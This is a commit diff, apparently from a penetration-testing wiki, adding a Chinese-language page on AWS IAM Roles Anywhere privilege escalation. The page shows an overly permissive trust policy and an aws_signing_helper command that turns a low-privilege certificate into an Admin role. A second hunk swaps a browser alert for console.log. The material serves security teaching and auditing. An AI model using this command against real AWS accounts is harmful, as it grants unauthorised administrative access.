Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/

2026-01-26 03:04:46 -08:00 · 2025-06-24 14:00:25 +00:00
parent 3a5bfd7531
commit a9df8ac698
2 changed files with 43 additions and 1 deletions
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md
@@ -0,0 +1,42 @@
+# AWS - IAM Roles Anywhere Privesc
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+AWS IAM RolesAnywhere 允许 AWS 以外的工作负载使用 X.509 证书承担 IAM 角色。但是，当信任策略没有正确限制时，它们可能会被滥用以进行权限提升。
+
+此策略缺乏对允许的信任锚或证书属性的限制。因此，任何与账户中的任何信任锚相关的证书都可以用来承担此角色。
+```json
+{
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Service": "rolesanywhere.amazonaws.com"
+},
+"Action": [
+"sts:AssumeRole",
+"sts:SetSourceIdentity",
+"sts:TagSession"
+]
+}
+]
+}
+
+```
+要进行权限提升，`aws_signing_helper` 是必需的，来自 https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
+
+然后，使用有效的证书，攻击者可以转向更高权限的角色。
+```bash
+aws_signing_helper credential-process \
+--certificate readonly.pem \
+--private-key readonly.key \
+--trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \
+--profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \
+--role-arn arn:aws:iam::123456789012:role/Admin
+```
+### 参考
+
+- https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation/
+
+{{#include ../../../../banners/hacktricks-training.md}}
--- a/theme/ai.js
+++ b/theme/ai.js
@@ -226,7 +226,7 @@
        `threadId=${threadId}; Path=/; Secure; SameSite=Strict; Max-Age=7200`;
    } catch (e) {
      console.error("Error creating threadId:", e);
-      alert("Failed to initialise the conversation. Please refresh.");
+      console.log("Failed to initialise the conversation. Please refresh.");
      throw e;
    }
  }